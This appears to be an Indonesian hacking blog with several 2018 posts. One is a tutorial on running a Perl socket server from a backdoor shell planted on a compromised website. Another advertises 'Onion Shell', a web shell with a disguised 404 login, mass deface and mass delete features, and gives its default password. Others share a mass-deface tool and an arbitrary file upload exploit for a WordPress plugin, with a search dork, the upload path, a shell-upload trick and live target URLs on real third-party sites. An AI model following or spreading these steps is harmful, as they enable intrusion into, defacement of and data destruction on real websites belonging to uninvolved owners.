Friday, 6 April 2018

Tutorial Socket Server With Perl

# Post By Mc'Sl0vv

Hai gan selamat sore, malam, siang, pagi:v
dipost ini ane mau kasih tutor socket server nih... socket server ini bisa dibilang mudah gan, kalo disite tuh biasanya kan ada domain lagi yang bisa disymlink atau jumping nah kalo socket server ini kamu gak perlu ribet symlink atau jumping..
ok, langsung aja siapin bahan nya:

~ Script socket server, KLIK DISINI
~ Web yang sudah tertanam shell backdoor dengan Perl ON (liat dibawah)


(edit scriptnya pake nick agan)
Langsung aja ke tutornya...
upload dulu script socket servernya... disini script perl punya ane adalah myport,pl


Jika sudah, ke command...


masukin command pertama:

perl myport.pl


lalu enter
(myport.pl itu nama script ane, kalau punya agan beda ganti aja jadi namascriptagan.pl)

dan masukin command kedua:

ps aux | grep 'perl'



lalu enter...
jika keluar seperti ini...


ada perl myport.pl berarti berhasil...
sekarang saatnya coba buka port yang sudah ditentukan.. kalu di script port ane portnya adalah 1999, jadi nanti cara ceknya adalah http://site.com:1999
saatnya cek berhasil atau tidak..


Yaa.... BERHASIL!!
cara lihat web mana saja yang kena tinggal reverse ip saja (klik disini)


nah dibawah ini adalah web yang kena socket servernya


Sampai sini saja tutorialnya... tunggu post selanjutnya dari ane:D
mohon maaf bila kurang jelas

Spesial Thanks For IndoXploit
Refrensi By IndoXploit

Tutorial Video:

Wednesday, 28 March 2018

Onion Shell

hae para jones!1!1!1!1

Dah  lama kagak post :V kali ini mimin pengen berbagi shell backdoor Onion Shell V1.
Onion Shell adalah shell pertama Idiot BlackHat, kenapa namanya onion? karena banyak defecel wibu awoakwoakwoakwk :V kami memilih nama Onion Shell karena pertama alasannya banyak defecel wibu dan kedua kalo kyta dorking Onion shell yang akan muncul adalah jenis-jenis makanan, jadi bisa dikatakan shell ini anti dorking :) Di shell ini toolsnya agak sedikit karena baru versi pertama.

            Oh iya shell ini kagak 100% hasil ngoding anak Idiot BlackHat tapi beberapa tools dan code kami ambil dari shell lain :) sebelumnya saya berterima kasih kepada orang-orang yang membantu pembuatan shell ini :)

okey langsung saja kita bahas yang ada didalam shell ini
fitur-fitur yang ada dalam shell ini adalah

  • 404 login page


Baru-baru ini banyak para defecel galo dan marah-marah mulu karena shelllnya kena tykung :V tapi tenang saja, di shell ini memiliki fitur login page 404 yang mampu berkamuplase menjadi not found :V sehingga shell ini agak sulit ditykung dan di dorking :V

  • upload
Di dalam shell ini memiliki dua jenis upload, yaitu uploader biasa dan uploader home root

  • command
  • jumping
  • mass deface dan mass delete
Kebanyakan para defecel zaman now sering pake tools mass deface dan mass delete karena mereka takut ditykung webnya :V oleh kerena itu kami sediakan fitur ini untuk kalian yang takut ditykung

  • ukuran kecil
Selain memiliki fitur-fitur diatas kyta juga perkecil ukuran shell ini menjadi 10kb :V kenapa kyta kecilkan? karena banyak web yang kagak bisa di tempel shell gede :V



password default "baubawang"


Itulah beberapa fitur yang ada dalam shell ini :)
tertarik? klik aja dibawah ini
download langsung



sekian dulu ea :* sampai berjumpa lagi  :*

Friday, 2 March 2018

Mass Deface Tool

# Coded By Mc'Sl0vv
# File Type: php
Share tool lagi nih gan, Mass Deface tool barangkali berguna
Link Copy Pastebin -> Click Here
Download Link -> Click Here
Semoga Berguna

Mini Tool MD5 Converter

# Coded: Mc'Sl0vv
# Share
# File type: php

Hai gan, hari ini ane mau share tool kecil nih MD5 Converter barangkali berguna kalo ada yang kurang atau tampilannya jelek maaf ya

link Copy Pastebin -> Click Here
Download Link -> Click Here

Semoga berguna

Tuesday, 27 February 2018

Arbitrary File Upload wp-image-news-slider Vulnerability

Dork: inurl:wp-content/plugins/wp-image-news-slider
Upload.php: wp-image-news-slider/js/swfupload/js/upload.php
Dorking dulu pake dork diatas pilih target, buka upload.php
Vuln: "No upload found in $_FILES for Filedata"
CSRF Online: Click Here
URL: http://site.com/[path]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
POST File: Filedata
Upload shell ext: .php.gif
shell location: /wp-content/uploads/random_name.php.gif
Live Target/Demo:
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php